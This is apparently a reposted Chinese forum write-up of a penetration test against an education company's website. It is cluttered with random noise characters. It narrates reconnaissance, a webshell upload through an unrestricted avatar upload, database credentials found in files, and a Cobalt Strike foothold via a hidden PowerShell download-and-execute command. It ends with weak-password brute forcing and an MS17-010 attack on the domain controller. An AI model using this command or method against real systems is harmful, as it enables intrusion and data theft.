|
: P- Z+ `6 @7 r2 Y 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路8 Q/ H8 N+ C' T$ p" |7 {# Y
7 P5 u' O: L1 L: Q1 C0 ^, h, a+ x3 {! Z7 a8 R
9 T8 O. M2 y0 m# @) L8 G ' P9 h; Y* o3 @2 `
- v5 T2 R) W! m( `$ k
正文0 T8 h" }6 e8 D* t
, r2 f, p& N! {1 d" v1 T# v
1 j3 q5 C; k+ C) X8 R0 ^- P 1 z% [+ ^. V; P8 N$ W3 I# h- c
8 n+ g! f! R8 P; @
( e% W- u) w% M 目标:www.xxxx.com(一家教育机构) / v# \# e. {# b: x7 r
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
; s) B6 e _$ A- r- _6 U. z( U
3 s2 Z; }+ d* j# G' X# [; ^, s; h
" o, F% A% F; H2 N
! R" @. I) U, C0 O) P 1 B' D) v: _: d( g3 E: f
$ m* y1 H# r4 b8 ]5 L1 P2 D; M
进行了简单的信息搜集
2 s* U2 W, T! q- M) a
& R6 j+ Y. r9 {4 I* p: h. c7 D1 k& \/ g6 x# ^
6 R+ c+ P# I: D o$ _2 A6 u$ r
' Y# Z- ?! n) t' [3 P) i 子域名搜集6 G M. j* {3 \" g' w& a4 p
3 W+ I8 f6 _# g- b( |
9 e/ X! c" K0 [+ d3 C/ \# {8 \1 g
+ G0 u5 ?, O2 O) }; x( P% m$ M6 b* X
; A, S- X P# y2 k8 M6 h' ^
7 n0 I. Y1 t: u5 Z5 h8 s fofa找资产 5 o! a {5 P9 q6 Z2 y S+ e) x
9 U5 ^) U+ L0 n9 j8 Z% Z3 b& x& g% ^% f
% G0 P5 b4 `& H/ m( |( l
. \* b) l9 T- l: i; j5 t) i / w8 s+ E! V- r5 d. b
' j0 D' t. y6 k2 `8 i9 `
' U+ y$ `0 w- ]" S& l6 k; G 一共七个资产。去重之后只有两个。 8 M% s" ^6 g0 O5 q5 M- T' C. h
6 k$ U5 H6 m3 W9 W \( ^0 h6 X) m' u
0 e1 l! W( @6 l% h. { % K& C+ H) L% R7 \
# R6 Z3 M2 x! [" r/ N 目录探测
$ C, |9 V* C1 n/ z. h" b 8 k# X9 N' ~7 y o
l! T. Q- `4 B0 z- P* y
- w5 f/ x8 w3 h6 p, Y9 w R* V1 n ; e* f9 q& M5 v) u
( [* f! @+ D" g/ z7 ~" {* E! f- z' y 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有 + ^1 O7 v9 h* w
' R' y0 n( t+ E3 Y7 |6 U: C9 g7 K- l
4 n3 E7 \0 |# t! t
& O. D& [) F, y
p. |0 i9 x& ?* D 我又尝试了通过修改返回包来绕过登录界面
1 D" S* Z9 e) n c ( @" W G* M. m6 ^7 J2 \2 ~" j6 p
& ], b7 ?" H+ @. z: ~
7 H( K; Y5 L/ _- E: j0 `3 r0 Y
0 n( `! W9 i; g" A$ t% h( R/ U/ H) C
还是不行,尝试注入无果# u) B u) ]/ N4 g; R
2 `) p/ R6 t1 y, f$ r
, ]2 r+ a) E1 {" `4 J8 j
9 [* | X. T8 X) t6 b
( W' ?; W4 @1 z6 ]6 W: z
4 L3 m5 o5 l2 i# X 不过我目录探测出了一处Spring信息泄露 % D3 ?4 \/ Q1 E- c* s: [9 b
' E. h# C% X0 ]& Y& Y
* J4 ? i; c" h I% f6 A/ O
% C4 j' w) |% E8 a+ f: j" w6 L% s% L) Y! I" S; ~$ L
2 g9 y) t9 ^2 B- ~# ]/ f* n
9 I8 A7 \/ x- |0 N- c# G. E# d5 `- `5 \/ f m9 R. o- k; h& ~
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
; k/ _) m! ?& i4 C x& q 7 R* [) d, C% Z. r, L' j
9 G& A! ~& n* k4 s! q
/ a8 y* |: e1 g( v% a, i " H K, I0 }8 q7 X" ?6 Y
% E0 N( ] V/ f8 I 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。, X& }3 c5 b7 e% I
& `' b2 Y7 q5 _' {6 k1 [
5 z6 ]2 g8 w9 q0 B , P$ { I) \! c( d9 S6 N* p
; E; J4 F- @- {1 W- g
! r8 K3 T- E/ m: A- \ 获取有些师傅到这一步就手机抓包电脑测了。, ^4 v8 j- R. h3 T
, r2 |+ Y* Z/ f+ |1 j( y4 }5 s
& }* }% f% B/ @4 H1 D Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
9 l0 x. q0 f6 g+ _. O + v6 [- p% C" e _% F
# ?. ^- j3 n2 S" Y" B. v1 o 其中在一个公众号发现了小程序,可以进行注册。
/ Q0 K% a" c$ K9 {: z
) |7 Z# `5 q; j8 Z4 p' ^6 G% I
5 G/ B3 b5 ]! z; Z1 Q 看到了头像上传,尝试上传获取WebShell
8 M) b& A# }9 a8 C6 G$ q 6 T$ h) Y0 h4 K* A8 t
& z& @$ t# b& `6 e) I: X
/ \; m- y: s" f7 Y- W
* ?/ p3 L& M, a, N8 q
* _- Z& o! e! Y7 F$ d 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
* m! ^: d; O% g' X: w: a7 ~$ { 7 M7 } B" o; @' ]
w3 _2 a( t. g$ ?# v8 b
2 S6 c( O. {* Z7 y5 m 0 E$ g5 S) m3 |* [' z' k' v2 T% T
* z1 N+ V# u6 r
然后上了大马
( `/ C& x4 y7 n0 g. | 7 ~$ a2 m; G% S2 G9 @" E7 W$ K
+ a3 @/ O1 C, [6 Z1 ~ $ x3 N% p" U5 S5 J! Y6 s( J5 }
& \+ F# B, d6 c5 k4 P) g! M; I& V: c
) h3 o# |& Q9 B0 k/ g3 k/ {
- C: n9 `% E2 ]' e7 B/ n8 N, {5 _' B; R2 m, J& H- f
通过翻找文件发现数据库账号密码; H, S, a6 X/ R0 @: j% ^, @
1 Z/ s D4 r# A! u9 G
# `& e2 ]8 t3 b( d- M0 K0 V6 v! s . g0 R8 w1 t" l. ]9 `* g% a
4 U0 b" b I2 O5 u! d" X( k5 L
( Q, T/ V$ d% F9 k( p4 ~2 m- g4 o
--内网渗透" C- `: `9 B! }; h7 |# b/ @
" S. V; k3 L. U9 x
$ f" @: u! b! ]9 z8 D; j! y
直接通过powershell执行 cs上线. d, a9 J# \4 ~, w
9 W2 U4 P8 |4 F/ [& K$ n3 P
7 i( P$ a0 }9 e6 U" i2 n
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"% H7 u5 R/ @- S; v3 [) @$ P
% ]( S6 }$ H8 ~5 I: s" {8 v
' x: |$ U/ M' x3 m5 l$ T! f4 P
, h, V5 f: ?" w! t- b g ! m* s7 O& b+ {* L' ^! M
8 Z% @( t5 d. k# H6 U! N 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
8 n- A2 D" X( _
$ Z. H: k9 a& ~# z$ I7 I8 y
+ T+ |1 w: j* P; n g
5 u( v9 v! `( l- h9 P! m6 n& M/ i P% c1 d
" d5 x7 L* _! _5 A
( t2 P# g* O1 n5 j' X a, t R/ D 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
0 d, `$ G- y& N* i; s# z ( K% Q- ?) |' E0 x k* ?
$ u) K' t" D; _+ g+ T% Q
+ L9 N) ?0 x* g; t) z6 H1 a % ?/ E% E" H& \! c1 ^ E5 p2 i
1 K+ V, q, L3 L; I # c$ N3 q2 k5 U2 \$ n5 ^
# A/ T( y( }9 J2 e
/ }- J! J5 U5 b, B5 z1 Z8 u
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭 6 h( n7 t( s, h3 s( C/ O
/ r" |" r* E7 w9 p5 R" ^, { ~
* l! r) _! ]. [: H, x/ P
& _9 ]. k% Y: |: j. p
& i4 ?3 o4 c) C
8 ]+ ?" O6 c+ K0 F
9 M+ n! ?1 _2 X/ B7 ^; \; b
( t4 F$ N" d3 e4 x! M ! ]5 m/ D6 ^* ?& b9 w/ @* }
. N/ l' z/ p/ `! d% o, } z: o! }
. R- z2 O) G" m% {- F _3 S! \
" O# Q& L* s( X0 n" I
6 X5 w# f7 p$ _' Q$ h2 h
3 q/ g3 L5 v& I
8 l: i K U! n5 a' [* ]4 R; Y6 a% q+ v* T/ T7 s# T
小结
5 L) j) t& u" v4 L0 R % J( @7 s2 a+ @
, W# p! { P' v9 Z3 Q% }. s
" L# W) D: l6 ?( o
) G) Y; ^ X9 P& J. l4 y! S) _8 D
! A% h+ o/ o2 b! l8 `
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
- R6 r/ ^: Y- ?) `, J" i8 X # D0 J$ i( I2 h9 J( H
) o: `3 Y# h: j/ P
; ^3 Y1 e/ u7 z/ w8 P- N9 A/ b5 i 5 b; [4 e. r. W' G
9 G' @7 f2 U" [. m, D; E -
( [9 J1 ~( j" M" j ; A3 @$ n. y4 C2 Q) D
! K) v& F+ ^! t
-
% [* [2 Z8 f5 S \$ t + F, t3 ~' Z8 s: ~1 Q" V
* a2 m7 ]0 e( k5 |, M# v7 S
. P% \: \7 w* D K5 M! n
; d+ g ~) A, P7 V5 C% n4 g 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html* F3 v7 ]- ^% v
?' t8 R! W" m: f" G
0 E1 d# q; Y$ W0 i
) G' ?- X/ t- i7 J0 ?. Q: J" T |